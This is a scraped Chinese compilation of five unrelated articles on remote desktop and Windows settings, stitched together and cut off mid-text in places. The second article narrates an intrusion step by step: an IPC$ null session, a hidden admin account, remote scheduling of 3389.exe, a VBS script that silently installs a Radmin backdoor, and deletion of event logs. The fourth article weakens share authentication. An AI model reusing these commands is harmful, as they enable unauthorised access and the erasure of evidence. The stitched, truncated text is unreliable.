- A+
远程桌面连接命令范文第1篇
关键词:IPv6;远程桌面;端口
中图分类号:TP393文献标识码:A文章编号:1009-3044(2012)08-1747-02
IPv6是Internet Protocol Version 6的缩写,是IETF设计用于替代现行版本IPv4协议的下一代IP协议。IPv4的网络地址为32位,而IPv6的网络地址为128位。
Windows操作系统下的远程桌面是微软公司为了方便网络管理员管理维护服务器而推出的一项服务,通过远程桌面协议RDP(Remote Desktop Protocol)实现。从Windows 2000 Server版本开始引入,网络管理员使用远程桌面连接程序连接到网络任意一台开启了远程桌面控制功能的计算机上,就好比自己操作该计算机一样,运行程序,维护数据库等。目前很多的管理员都是在Windows XP系统环境下使用远程桌面。
当前远程桌面被广大系统管理员用于相关的远程管理中,主要是在IPv4的网络环境下使用。远程桌面使用的默认端口是3389。
1 Windows下的远程桌面
目前计算机用户主要使用微软操作系统有Windows XP和Windows 7,所以本文主要以这两种系统为特例进行讨论。在IPv4环境下,Windows操作系统使用远程桌面非常的简单,只需要被控端Windows操作系统开启了远程桌面功能和打开3389端口。而在IPv6环境下,由于Windows XP系统的远程桌面连接程序不支持128的IPv6地址,所以在默认情况下不能正常使用远程桌面功能。Windows 7操作系统的远程桌面连接程序则可以支持IPv6地址。
虽然远程桌面使用方便,但是需要满足一定的网络环境,如果被控端的计算机在网路防火墙或NAT的后台,那么远程桌面功能很难实现。原因是网络防火墙一般会拒绝3389端口的服务,而NAT不会把内网中被控计算机的IP地址映射到公网上。如果要满足远程桌面的需求,就需要网络管理员进行特殊设置,但为了网络安全,这种需求往往不能被允许。
由于目前支持IPv6的流控设备和防火墙监控设备应用较少,如果计算机所连接的网络支持IPv6,就可以不用担心网络防火墙对应用层的阻隔。远程桌面可以通过IPv6来实现无障碍连接。
2 IPv6下远程桌面的使用方法
IPv6在国内已经得到了广泛的使用,很多单位或机构直接接入了Cernet2网络。而国内的各大网络运营商也加强了对IPv6的支持。网络运营商通过隧道技术,普通居民使用宽带拨号都可以实现IPv6的应用。而目前IPv6环境下,两台计算机如果都可以得到IPv6地址,就可以突破网络防火墙和NAT的限制,实现应用层的服务。
查看Winsows操作系统IPv6地址的方法是在cmd命令窗口中输入:netsh interface IPv6 show address,会显示出计算机的IPv6地址,如图1所示。
图1 cmd窗口下查看IPv6地址
在Windows XP系统下如果显示IPv6没有安装,则输入netsh interface IPv6 install安装IPv6协议即可。
2.1 Winsows 7远程桌面连接程序对IPV6的连接方法
Windows 7操作系统的远程桌面连接程序支持IPv6,所以打开远程桌面连接程序后,直接在地址栏输入被控端的IPv6地址,连接远程计算机,即可实现远程桌面的应用,如图2所示:
图2 Winsows 7远程桌面连接IPv6地址
或者在cmd命令窗口下输入:mstsc -v:2001:da9:9000:c010::134,其中2001:da9:9000:c010::134为远程受控端计算机的IPv6地址。
2.2 Winsows XP远程桌面连接程序对IPV6的连接方法
由于Windows XP的远程桌面连接程序不支持IPv6,那么广大的Windows XP用户就不能再IPv6环境下直接使用远程桌面了,或者用户不得不把操作系统换成Windows 7。为了解决这个问题,可以采用端口的方法来实现Windows XP下远程桌面应用对IPv6的支持。
2.2.1受控端计算机设置
在受控端IPv6下指定的3389远程桌面连接转发到本机IPv4上,命令为:netsh interface portproxy add v6tov4 3389 127.0.0.1 3389,可以使用netsh interface portproxy show all及netstat -ano | find "3389"命令查看相关信息。如图3所示。
图3 cmd窗口下受控端计算机的设置
2.2.2控制端计算机设置
控制端对本机指定端口的连接(IPv4下)转发为对IPv6远程桌面端口的连接(IPv6下)。例如使用命令:netsh interface portproxy add v4tov6 8888 2001:da9:9000:c010::134 3389。如图4所示:
图4 cmd窗口下控制端计算机的设置
其中8888为远程桌面映射的端口,可以自己随意设置,但设置的端口不能有冲突。2001:da9:9000:c010::134为远程受控端计算机的IPv6地址。使用者可以根据自己的需要修改这两个参数。最后打开远程桌面连接程序,在地址栏输入127.0.0.1:8888连接远程计算机。这样就实现了Windows XP远程桌面对IPv6的支持,如图5所示:
图5
3总结
本文主要讨论了Windows XP/7在IPv6环境下使用远程桌面的方法,由于Windows XP远程桌面连接程序设计的缺陷,不能支持IPv6的地址,文章提出采用端口的方法,在IPv6及IPv4间进行报文转发,从而间接的实现了Windows XP远程桌面在IPv6环境下的连接方法。
参考文献:
[1]冯松.远程桌面连接技术的应用[J].计算机与网络,2009,20.
远程桌面连接命令范文第2篇
√ 黑客常见入侵方式
√ 如何避免空连接漏洞
√ 如何从日志发现木马藏身地
小黑:一个水平中等的“黑客”,曾拜师于一名高手,所以水平有所长进,最近正想找一台机器练手。
小白:刚刚上任不到三天的网管,进入网络安全行业不久,安全水平和发现隐患的意识还需要提高。这次的攻击事件其实并不是黑客水平有多高,而是由于网络安全意识不足,一个N年前的老漏洞没进行修补导致了服务器被攻击。反思一下,上任的几天里一直忙碌着升级、打补丁;但是忽略了服务器默认的一些系统漏洞和日志的保护,让黑客钻了空子。国内很多网络管理人员都容易出现这种错误。本文就是提醒各位网络管理员,除了给系统打补丁外,还需要掌握基本的检测技术和保护系统日志才能保证服务器的安全运行。
23:25 觅食――入侵检测
晚上11点,某大虾黑客的徒弟小黑打开“IPC$空连接扫描器”,想看看今天是否能中奖找到一台不设防的服务器。时间慢慢的流逝,深夜中传来一声“YEAH!”,哈哈,居然真的还有这么原始漏洞的主机!小黑兴奋地敲击着键盘开始了入侵工作。
小提示:什么是IPC$空连接
IPC$(Internet Process Connection)是共享命名管道的资源,它是为了让进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计算机和查看计算机的共享资源时使用。利用IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然对方机器必须开了ipc$共享),而利用这个空的连接,连接者还可以得到目标主机上的用户列表,从而开始入侵主机。
23:30 挂上诱饵――建立IPC$空连接
小黑打开本地的cmd.exe命令行,输入net use \\202.99.10.*\ipc$ "" /usE:""尝试连接对方服务器,连接成功!输入:net view \\202.99.10.* 发现C$ D$ E$ admin$都默认开启着,原来是台新服务器啊!怪不得,小黑嘴里手上都不清闲。我要完全控制这台服务器!
23:45垂钓――远程控制
IPC$空连接这个漏洞不可能一直存在,先弄个远程管理员好了――屏幕中的命令行下出现了一段命令:
net user xiaohei$ hacker /add
net localgroup administrators xiaohei /add
恩,这样子就拥有了管理名为xiaohei$ 密码为hacker的高级管理员了,以后就可以通过Windows自带的“免杀控制器”:“远程桌面连接”控制服务器了! 来试验一下,打开本地开始菜单所有程序附件通讯远程桌面连接,在空白地方输入控制服务器的IP地址:202.99.10.*。“是放个木马上去呢还是添加一个FTP账号呢?”小黑脑子中闪现着无数恶毒的后门。正在这时音响中“嘣”的一声,错误提示:无法连接到远程计算机(见图1)!
图1
居然未开启远程服务端口了,难不倒我!继续在命令行下输入: copy C:\3389.exe \\202.99.10.*\admin$ ,将小黑本地的远程登录服务开启上传到202.99.10.*的服务器上。
net time \\202.99.10.*,查看远程服务器的系统时间为下面的入侵收集资料,现在时间是凌晨2:10分,at \\202.99.10.* 02:18 3389.exe,利用at命令在远程计算机的2:18分执行3389.exe文件,开启远程控制(需要自动重新启动计算机)。
小提示:远程桌面为什么“免杀”?
远程桌面本是微软公司为了方便网管维护服务器而推出的一项服务,用来连接到开启了远程桌面控制功能的计算机,但是已经被很多黑客用来控制电脑。由于是系统自带服务,也不会受到杀毒软件的查杀。
凌晨2:35上钩――种植木马
为了保险起见,还是再增加一个木马后门程序控制,小黑阴险地笑着祭出了radmin影子版,由于此软件属于管理工具,一般杀毒软件都不对其设防,所以修改后成了最安全的隐形后门。
小黑配制好木马后写了一段VBS代码使木马程序可以自动执行:
set ws=wscript.createobject(“wscript.shell”)
ws.run “regedit.exe /s r_server.reg”,0
ws.run “regedit.exe /s qidong.reg”,0
ws.run “r_server.exe /install /silence”,0
ws.run “r_server.exe /start”,0
将木马程序打包成muma.exe自解压文档,选择运行后自动执行VBS内容,将木马上传到系统盘下,继续利用:at \\202.99.10.* 02:15 muma.exe
凌晨2:40收网――日志清理
对了,得意不能大意,要把操作日志清理了,防止管理员发现主机被动过手脚:
del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log
哈哈,看你还如何逃出我的掌心!!在恶魔的笑声中 202.99.10.*主机沦陷了。
凌晨3:30脱钩――查询服务
正在机房值班网管小白发现今天刚刚安装的WEB服务器(网页服务器)日志少了一段,“有可能被黑客入侵!”
“服务器刚刚安装还没进行安全设置就被强制运行了,没想到这么快就有黑客来入侵,现在的网络真是危险啊!”小白叹了口气,日志没了。看来要手工检测了。在命令行中输入:net start ,察看启动服务(见图2)。居然Terminal Services远程控制服务被开启了,肯定被添加了管理用户。
图2
输入: net user,察看本地所有用户,只有administator、ASPNET、IUSR_TOPJHCN、IWAM_TOPJHCN 几个正常用户,再分别用:
net user administator
net user ASPNET
查看了用户组,一切正常。看来很可能是被建立了隐藏的管理账号了。可以用下面提供的批处理程序察看隐藏账号,代码如下:
@echo off
cd.>netuser.txt
for /f "skip=4 tokens=1-3" %%i in ('net user') do (
if not "%%i"=="命令成功完成。" net use %%i>>netuser.txt 2>nul
远程桌面连接命令范文第3篇
究其原因,有一部分应该归结为W i n d o w s 7系统的过度“智能化”,这些“智能化”操作有时不但没有给用户提高操作效率带来帮助,而且还可能暴露用户的操作隐私。所以,在一些特殊场合下,我们需要采取措施,不能让Windows 7系统过度“智能化”!
不让浏览窗口智能关闭
在使用Windows 7系统自带浏览器上网访问内容时,有时一个网站的大部分内容都已经被显示出来,此时,网页中的任何一个微小错误出现,Windows 7系统就会自动关闭整个浏览窗口,导致以前传输显示的内容都会跟着关闭,显然这种智能关闭窗口功能会降低上网浏览效率。为了不让浏览窗口智能关闭,我们可以按照如下操作来设置Windows 7系统:
首先启动运行W i n d o w s 7系统中的I E浏览器程序,依次单击浏览窗口中的“工具”|“Internet选项”命令,弹出I n t e r n e t选项设置对话框,选择其中的“安全”标签,打开如图1所示的标签设置页面,检查这里的“启用保护模式(要求重新启动Internet E x p l o r e r)”选项是否处于选中状态,一旦发现该选项已被选中时,必须及时将其取消选中,再单击“确定”按钮返回。
完成上述设置任务后,日后要是再碰到浏览窗口自动关闭情况时,不妨尝试点击Internet选项设置对话框中的“高级”选项卡,切换到高级选项设置页面,单击其中的“重置”按钮,将I E浏览器的设置恢复到原始状态,这样问题多半就能被成功解决了。当然,要提醒各位的是,要是将浏览器的“启用保护模式”关闭后,I E浏览器会弹出消息提示可能存在风险。
不让网络协议智能调谐
与低版本操作系统相比,Windows 7系统新增加了一项T C P/I P网络协议自动调谐功能,这项功能会根据网络环境的变化,对当前网络连接进行自动优化调整。不过这项智能化功能,在网络传输或下载大块头的多媒体文件时,没有多大实际意义,相反还容易造成文件传输速度十分缓慢,甚至不能稳定传输文件的故障现象。所以,当我们在局域网中传输大容量文件时,不妨临时关闭Windows 7系统的网络调谐功能,让其不要对T C P/I P协议自动进行调谐,下面就是具体的关闭操作步骤:
首先打开Windows 7系统的“开始”菜单,从中逐一点选“所有程序”|“附件”命令,选中下级菜单中的“命令提示符”选项,再用鼠标右键单击之,从弹出的快捷菜单中点选“以管理员身份运行”命令,切换到MS-DOS命令行窗口。
其次在M S - D O S命令行窗口中,输入“netsh int tcp set global autotuninglevel=disable”字符串命令,单击回车键后,系统会弹出如图2所示的确认信息,这样网络调谐功能就会被临时停用掉了,这个时候再进行大容量文件的传输操作或下载操作,网络连接的稳定性就会好多了。
不让网络选择智能提示
当安装了Windows 7系统的笔记本每次移动到不同的位置办公时,该系统自带的网络位置识别功能,总会智能弹出网络选择提示,要求系统在接入新的网络后,选择一个合适网络位置,这样Windows 7系统方便为对应网络创建相关的配置文件,确保系统防火墙安全策略可以保护该网络的访问安全。不过,从实践角度来看,Windows 7系统的网络选择智能提示功能并没有多大实际作用,有时这项功能反而会影响上网访问效率。如果不想让网络选择智能提示,不妨进行下面的操作将该功能临时关闭:
首先逐一点击Windows 7系统“开始”菜单中的“所有程序”|“附件”|“运行”命令,切换到系统运行文本框,执行“gpedit.msc”命令,弹出系统组策略控制台窗口。
其次在该窗口左侧显示窗格中,依次选择“计算机配置”|“Windows设置”|“安全设置”、“网络列表管理器策略”目录,用鼠标右击该目录下的“无法识别的网络”选项,执行右键菜单中的“属性”命令,打开对应组策略的选项设置框,检查用户权限设置是否正确,同时选中“用户可以更改位置”,并且将“位置类型”设置为平时经常用的“公用网络”位置,最后按“确定”按钮返回。
接着在系统运行文本框中再执行“r e g e d i t”命令,弹出系统注册表控制台窗口,依次展开H K E Y_L O C A L_ M A C H I N E\S Y S T E M\ C u r r e n t C o n t r o l S e t\ C o n t r o l \ N e t w o r k \ NetworkLocationWizard注册表目录,看看指定目录下有没有“H i d e W i z a r d”双字节键值,要是找不到该键值时,直接右击“NetworkLocationWizard”目录,依次执行右键菜单中的“新建”|“D w o r d值”命令,手工创建好双字节键值“HideWizard”,再用鼠标双击该键值,打开如图3所示的编辑数值对话框,在其中输入数字“1”,并单击“确定”按钮保存设置,最后重新启动计算机系统即可。
不让IPv6协议智能连接
在Windows 7系统中利用宽带拨号方式建立上网连接时,用户或许会觉察到系统自带宽带拨号程序在建立上网连接时,速度没有低版本系统快,不过一旦宽带连接成功建立后,上网速度却与正常一样,这是怎么回事呢?出现这种不正常现象,主要是Windows 7系统自带拨号程序在进行宽带拨号操作时,会智能优先选用TCP/IPv6协议创建上网连接,等到TCP/IPv6协议连接失败后,才会尝试利用TCP/IPv4协议再次建立上网连接,很明显Windows 7系统的这种智能化操作会降低宽带拨号上网效率。为了不让TCP/IPv6协议智能连接,我们可以按照如下操作设置Windows 7系统的上网参数:
首先用鼠标右键单击Windows 7系统托盘区域处的上网连接图标,执行右键菜单中的“网络和共享中心”图标,展开网络和共享中心管理界面,单击该界面左侧任务栏中的“更改适配器设置”按钮,切换到对应系统的网络连接列表界面。
其次用鼠标右键单击宽带拨号上网连接图标,执行右键菜单中的“属性”命令,弹出宽带拨号连接属性对话框,选择“网络”标签,在对应标签页面中(如图4所示),检查“Internet协议版本6(TCP/ IPv6)”选项是否已被选中,要是发现其已被选中时,只要将该选项取消选中,再按“确定”按钮返回即可。
不让搜索功能太过智能
Windows 7系统的搜索功能比以往有了很多的进步,它的工作原理不但与以前完全不一样,而且搜索智能化程度也有了大幅提升。然而,搜索框直接显示在“开始”菜单中,用户不经意间输入的一些字符,可能会将很重要的隐私信息搜索出来。为了保护自己的隐私,我们可以设置Windows 7系统的搜索功能,让其不要太过智能,去自动搜索自己的隐私信息,下面就是具体的设置步骤:
首先要将隐私信息从索引列表中排除出来。由于Windows 7系统缺省会自动搜索索引文件,出现在索引列表中的隐私信息自然容易被自动搜索显示出来。为此,我们可以打开Windows 7系统的“开始”菜单,在其中的搜索框中输入“索引选项”,按回车键之后,打开索引选项设置界面;倘若看到系统还没有创建索引列表时,那就不要进行设置,要是看到隐私内容已经出现在索引列表中时,不妨单击“修改”按钮,切换到索引位置列表框,取消隐私文件夹的选中状态,再按“确定”按钮返回。
其次要将隐私信息隐藏起来,因为搜索功能不会智能搜索显示隐藏属性的文件。在进行这种操作时,可以先打开系统资源管理器窗口,从中找到隐私文件夹,并用鼠标右击该文件夹,执行快捷菜单中的“属性”命令,将“隐藏”选项选中,再按“确定”按钮即可。日后,自己想访问隐私信息时,可以依次单击系统资源管理器窗口中的“组织”|“文件夹和搜索选项”命令,打开文件夹和搜索选项设置框,点击其中的“查看”标签,弹出如图5所示的选项设置页面,选中“显示隐藏的文件、文件夹和驱动器”选项,单击“确定”按钮即可。
此外,Windows 7系统的搜索功能还会智能显示最近输入的搜索关键字,这种功能也会暴露自己的搜索隐私。为此,我们可以依次单击“开始”|“运行”命令,在系统运行对话框中,输入“gpedit. m s c”命令,单击回车键后,切换到系统组策略编辑界面,将鼠标定位到该编辑界面左侧区域中的“用户设置”|“管理模板”|“W i n d o w s组件”|“W i n d o w s资源管理器”分支上,双击该分支下的“关闭显示最近输入的搜索”选项,在其后弹出的选项设置框中,选中“已启用”选项,再按“确定”按钮保存设置,这样Windows 7系统的搜索功能日后就不会智能显示最近输入的搜索关键字了。
不让网络下载智能掉线
很多用户反映,在Windows 7系统中通过专业下载工具进行无人值守式的信息下载操作时,每次将系统切换到休眠模式状态,网络下载连接总会智能掉线。在排除上网连接线路、上网配置参数等因素后,这种现象很可能是Windows 7系统的网卡设备启用了节电模式,这个时候可以按照如下步骤,临时关闭网卡设备的电源节约管理模式:
首先逐一单击Windows 7系统的“开始”|“控制面板”选项,点选系统控制面板窗口中的“网络和Internet”图标,双击其后界面中的“网络和共享中心”选项,打开网络和共享中心管理页面,按下左侧区域的“更改适配设置”按钮,切换到系统网络连接列表界面。
其次用鼠标右键单击“本地连接”图标,从弹出的右键菜单中选择“属性”命令,打开目标本地连接的属性设置框;按下“配置”按钮,进入对应网卡设备的属性设置界面,选择“电源管理”标签,展开如图6所示的标签设置页面,看看这里的“允许计算机关闭此设备以节约电源”选项有没有被选中,要是看到它已处于选中状态时,那就说明此时此刻网卡设备的电源管理功能已经启用,此时可以将对应该选项前面的勾号取消掉,这样就能不让网络下载智能掉线了。
不让系统登录智能监控
在几个用户共同使用相同计算机的场合下,Windows 7系统默认状态会智能地将用户上一次的详细登录信息监控并显示出来,很显然这项智能功能会暴露用户的登录痕迹,不利于保护用户的登录安全。有鉴于此,我们可以按照如下设置,不让Windows 7系统对用户的登录信息进行智能监控:
首先逐一点击Windows 7系统“开始”菜单中的“所有程序”|“附件”|“运行”命令,切换到系统运行文本框,执行“g p e d i t.m s c”命令,弹出系统组策略控制台窗口,在该窗口的左侧列表中,依次展开“计算机配置”|“Windows设置”|“安全设置”|“本地策略”|“安全选项”分支,用鼠标双击该分支下的“交互式登录: 不显示最后的用户名”选项,打开如图7所示的选项设置对话框,将“已启用”选项选中,再单击“确定”按钮返回。
其次依次展开“计算机配置”|“管理模板”|“W i n d o w s组件”|“Windows登录选项”分支,双击该分支下的“在用户登录期间显示有关以前登录的信息”选项,选中其后界面中的“已禁用”选项,再单击“确定”按钮执行设置保存操作,这样一来Windows 7系统日后就不会对用户登录系统信息进行智能监控了。
不让网络连接智能切换
在同一个上网位置,有时会有很多信号质量不一的无线网络。在这种环境下,笔记本电脑上网访问时,遇到信号质量更好的无线网络时,它就可能会智能与其建立连接,从而造成上网不稳定的现象,那么怎样才能不让网络连接智能切换呢?很简单,只要按照如下操作设置Windows 7系统的无线网络连接,让其不智能切换:
首先逐一单击Windows 7系统的“开始”|“控制面板”选项,点选系统控制面板窗口中的“网络和Internet”图标,双击其后界面中的“网络和共享中心”选项,打开网络和共享中心管理页面,按下左侧区域中的“管理无线网络”按钮,如图8所示,展开无线网络连接列表界面,右击正在使用的无线连接,从弹出的右键菜单中选择“属性”命令。当然,如果无线网络连接列表界面中没有任何连接时,不妨按下“添加”按钮,手工添加一个无线上网连接。
接着检查无线网络连接属性框中的“连接到更适合的网络”、“当此网络在范围时自动连接”等选项是否处于选中状态,要是发现它们已被选中时,必须及时将它们的选中状态取消,再按“确定”按钮返回,这样一来,日后Windows 7系统即使发现其周围存在信号质量更好的无线网络,也不会智能与其建立连接。
不让远程桌面智能验证
当安装有低版本操作系统的客户机,通过远程桌面程序访问Windows 7系统时,Windows 7系统总会对其进行智能网络身份验证,这时,低版本客户端系统无论输入什么登录账号,都不能确保远程桌面登录操作成功。如果想让类似Windows XP这样的操作系统能够顺利与Windows 7系统建立远程桌面连接时,可以按照如下设置操作,不让Windows 7系统对低版本系统的远程桌面连接进行智能验证:
远程桌面连接命令范文第4篇
1 提高共享访问效率 无论是访问局域网中的共享文件夹,还是访问网络打印机,我们时常会遇到这样的麻烦,每次进行共享访问操作时,都要访问一次共享资源所在的主机系统,每次访问目标主机系统时都要输入一次共享访问账号与密码。显然这对网络访问操作不太熟悉的朋友来说是一件非常麻烦的事情。这将严重影响他们的共享访问效率。
出现这种麻烦的主要原因,就是Windows系统考虑到安全方面的因素,在默认状态下关闭了Guest账号的启动运行状态,这样一来Windows系统无法直接以Guest账号完成共享资源的访问,此时每进行一次共享访问操作时系统屏幕就会自动弹出一次密码输入对话框的现象。
事实上,在一些只包含两三台工作站的小型内网环境中,巧妙地激活Guest账号,可以让共享文件夹或网络打印机的访问,不需要输入共享账号名称与密码,就能直接实现访问目的,从而可以大幅度地提高共享访问效率。要让Windows系统自动以Guest账号完成共享访问登录操作,我们可以按照如下步骤设置Windows系统:
首先启用Guest账号。由于在默认状态下,Guest账号已经被关闭运行,我们必须先将该系统账号启用起来i在启用运行该账号时,依次单击“开始”、“设置”、“控制面板”命令,在弹出的系统控制面板窗口中,用鼠标双击其中的“用户账户”图标,在其后出现的窗口中再逐一点击“用户账户”、“管理其他账户”选项;从“选择希望更改的账户”列表中选中没有启用的Guest账号,再用鼠标双击该账户图标,打开设置窗口,单击“开”按钮,那样一来对应系统中的Guest账号就能被启动运行成功了。
其次允许网络访问。为了保证本地工作站的运行安全,Windows系统在默认状态下是禁止Guest账号通过网络访问自己的,为此我们还需要在共享资源所在的主机系统,设置一下相关参数。让其允许Guest账号通过网络来进行共享访问;在进行这种设置操作时,我们可以依次单击“开始”、“运行”命令,在弹出的系统运行对话框中,输入组策略编辑命令“gpedit.mec”,单击回车键后,进入对应主机系统的组策略控制台窗口;在该控制台窗口的左侧显示区域中,依次点选“计算机设置”、“Windows设置”、“安全设置”、“本地策略”、“用户权限分配”分支选项,在目标分支选项下面用鼠标右键单击“从网络访问此计算机”组策略项目,并执行右键菜单中的“属性”命令,打开设置对话框。
单击该对话框中的“添加用户或组”按钮,打开用户选择对话框,从中选中Guest账号并单击“确定”按钮,这么一来,目标共享资源所在的主机系统日后就能允许Guest账号通过网络直接访问本地系统中的共享文件夹或网络打印机了。
下面为Guest账号授权。目标共享文件夹或网络打印机在默认状态下都不允许Guest账号进行访问,我们只有为Guest账号授予合适的访问权限。才能保证共享访问操作成功。为Guest账号授权其实很简单,我们可以先进入共享资源所在的文件夹窗口,从中用鼠标右键单击目标共享资源图标,从弹出的快捷菜单中点选“属性”命令,打开目标共享资源的属性设置对话框,单击其中的“共享”标签,并在对应标签设置页面中单击“高级共享”按钮,在弹出的高级共享对话框中继续单击“权限”按钮,进入权限设置窗口,在该设置窗口中单击“添加”按钮,从弹出的账号选择对话框中选中Guest账号并单击“确定”按钮,之后再选中Guest账号,并为该账号设置“读取”或其他控制权限。这样一来Guest账号日后就有权利访问目标共享资源了。
最后不要进行身份验证。目标共享资源所在的主机系统往往会对任何一位共享访问用户进行身份验证操作,在可信任的内网工作环境中,我们可以通过设置,让Windows系统不要对共享访问用户进行身份验证操作,以便节约时间,提高共享访问效率。要做到这一点,我们可以按照之前的操作步骤进入共享资源所在主机系统的组策略控制台窗口,依次展开该窗口左侧子窗格中的“计算机设置”、“Windows设置”、“安全设置”、“本地策略”、“安全选项”分支,从目标分支下面双击“网络访问:本地账户的共享和安全模型”选项,在其后出现的设置界面中选中“仅来宾一对本地用户进行身份验证,其身份为来宾”选项。再单击“确定”按钮,如此一来Windows系统日后就不会对共享访问用户进行身份验证操作了。
完成上面的各项设置任务后,我们日后再次通过网络访问内网中的共享文件夹或网络打印机时,就像访问本地文件夹或打印机那样方便了,而不需要每次输入访问账号和密码了,很显然这样可以大大提高共享访问效率。
2 提高远程关机效率 在内网环境中,有的人可能同时要管理或操作几台工作站,不用谈其他的管理操作,就连简单的关机操作,如果每次都是一台一台地进行的话,那工作量也是不小的。为了提高远程关机效率,我们可以赋予Guest账号远程关机权限,让网络管理员可以直接在本地快速执行远程关机操作,那效果几乎与在本地关机一样,下面就是快速远程关机的具体设置操作:
首先在待控制的计算机系统中启用运行好Guest账号,同时为该账号设置好允许通过网络访问目标计算机的权限,具体的设置过程,本文在这里就不重复叙述了。
其次设置远程关机权限。在默认状态下,Windows系统禁止Guest账号通过网络来远程关闭自己,为此我们需要开通这个权限,才能保证日后网络管理员可以直接以Guest账号完成远程关机操作。在设置远程关机权限时,先打开待控制计算机系统的组策略控制台窗口,在该窗口的左侧显示区域中,依次点选“计算机设置”、“Windows设置”、“安全设置”、“本地策略”、“用户权限分配”分支选项,在目标分支选项下面找到“从远程系统强制关机”组策略项目,并用鼠标双击该项目,打开设置对话框。
单击该对话框中的“添加用户或组”按钮,打开用户选择对话框,从中选中Guest账号并单击“确定”按钮,这样一来Guest账号就有远程关闭系统的权限了。
最后进行远程关机操作。倘若我们现在要对内网中的其他待控制的计算机系统执行关机操作时,可以先打开自己的计算机系统,依次单击“开始”、“运行”命令,在弹出的系统运行对话框中输入“cmd”字符串命令,单击回车键后,将系统切换到MS-DOS命令行窗口,在该 窗口的命令行提示符下执行字符串命令“shutdown/i”,打开远程关机对话框。
单击该对话框中的“添加”按钮,从其后出现的远程计算机选择对话框中,将待控制的目标计算机名称选中并添加进来,同时选中“关机”选项,再设置好警告显示时间以及警告内容,例如将警告时间设置为“5”,将警告内容设置为“马上要关机了”,最后单击“确定”按钮,此时待控制的目标计算机系统屏幕上立即会出现“马上要关机了”的警告提示了,5秒钟后该计算机就会被强行关闭了。整个关机过程不需要进行任何身份验证操作,显然这样的远程关机效率是非常高的。 3 提高远程连接效率 有的时候,为了加快远程桌面连接效率,我们希望本地系统直接以Guest账号快速与远程计算机建立连接,要做到这一点,我们只要按照如下步骤进行设置就可以了:
首先在远程计算机系统中启用运行好Guest账号,同时为该账号设置好允许通过网络访问目标计算机的权限,具体的设置过程,本文在这里就不重复叙述了。
远程桌面连接命令范文第5篇
引言
由于计算机网络技术的迅猛发展,计算机远程监控被广泛应用在各个领域中,但在其运用过程中都需要通过鼠标操作与键盘操作来截取实时远程监控画面,在这一过程中产生了几个关键问题需要解决。例如:如何实现远端计算机数据与网络的交换,如何使远端屏幕桌面的传输及压缩更有效?以上等等都是计算机远程监控系统技术研究所面临的主要问题。
1 远程监控系统的设计流程
这一远程监控系统主要由服务器端与客户端程序所组成,使用之前应先把客户端程序安装至主控制计算机上,服务器端则安装于被控计算机上。接着在主控制端计算机上运行客户端应用程序,用于建立与服务端之间的远程控制,运用该远程监控系统中的控制功能来传送口令,且通过服务器端中的控制软件来执行各项远程操作,例如:截获目标计算机桌面的屏幕图形,提取且记录远程客户端的鼠标及键盘事件等方面的内容。[1]被控制计算机的屏幕图像其截获过程实质上就是客户端接收服务端屏幕图像数据传输的过程,而传输的关键则在于怎样进行屏幕图像的无损压缩和有损压缩,除此之外屏幕图像的传送还应注意屏幕图像的相关数据的传输时间,是否每一次传输都需要全部的数据等问题。
本文通过运用应用程序中的伪消息机制以及套接字技术,来实现服务器及客户端的数据交换,以此满足远程监控和被监控。
2 远程监控程序服务器端和客户端中的模块
2.1远程监控程序服务器端的本文由http://收集整理模块
该远程监控系统中服务器端的模块主要有:1)网络模块,其主要职责在于监听客户端的联接,在接收到命令后做出相应的处理;2)编码模块,主要进行屏幕图片的压缩编码,常用的方法有:行程-霍夫曼编码、行程编码等[2];3)主框架模快,负责服务器端映射及息的处理信。WWW.133229.CoM
2.2远程监控程序客户端的模块
该远程监控系统中客户端的模块主要有:1)网络模块,其主要职责在于发送操作命令、连接监听端口、接收数据以及处理数据,并将接受到得图片数据反馈于本机中;2)解码模块,具有数据解码压缩的作用,该模块由用户在压缩对话框中进行选择;3)主框架模块,负责客户端映射及信息处理的;4)对话框模块,主要有网格数目以及解码、编码选择对话框(见图2)。
3 远程监控程序具体关键技术的实现
3.1消息模拟技术
一般情况下,用户在运行应用程序时的鼠标操作及键盘操作都会被驱动程序截获,并把这一系列的操作信息列入系统信息的队列,以便应用程序获取消息以及处理信息。但有部分应用程序,不具备外设驱动程序的输入功能,因此必须自行模拟外设信息且发送至系统信息的队列中,即消息模拟技术。[3]针对远程监控系统而言,客户端应用程序能够对服务器端进行自由操作,换而言之服务器端的应用程序应对客户端的键盘、鼠标操作消息进行模拟。
3.2屏幕网格化传输在屏幕图像数据中的应用
若每一次的数据传输都包括整个图像的数据,会对服务器的日常工作带来严重的影响。比如:颜色数是24真彩色,显示配置是1024 768的典型windows,其整个桌面屏幕图像的数据18.9mbit,不仅使得网络宽带被大量占用,还严重影响了windows系统其他程序的正常响应与处理,因此可采用网格化模式减少屏幕数据的传输量,即将屏幕桌面分割成数个大小一致的网格,以网格为单位向客户端传送屏幕图像数据,当接收到refresh命令后,服务器端则只传输本机屏幕出现变化的网格数据。[4]由于桌面图像的截取与传输过程紧密连接,通常屏幕在较短时间内只发生局部变化或不变化。
3.3针对屏幕图像压缩编码算法的优化
桌面屏幕中全部的网格帧可称为i帧,而出现变化的网格帧则为p帧,由此可见,一旦客户端做出refresh时,服务器端应用程序都会只传送p帧至客户端,但是服务器端的第一次refresh任务,实际上是传送的书完整的i帧。在实际操作中,针对i帧的图形数据可直接截取且传送;p帧的网格图像数据而是相应的新屏幕图像数据减去原本图像数据的差值,也就是p帧所包括的网格数据其实是旧网格的差图。采取huffman算法来对i帧进行压缩,运用run length encoding算法来在电脑屏幕上对p帧进行压缩。
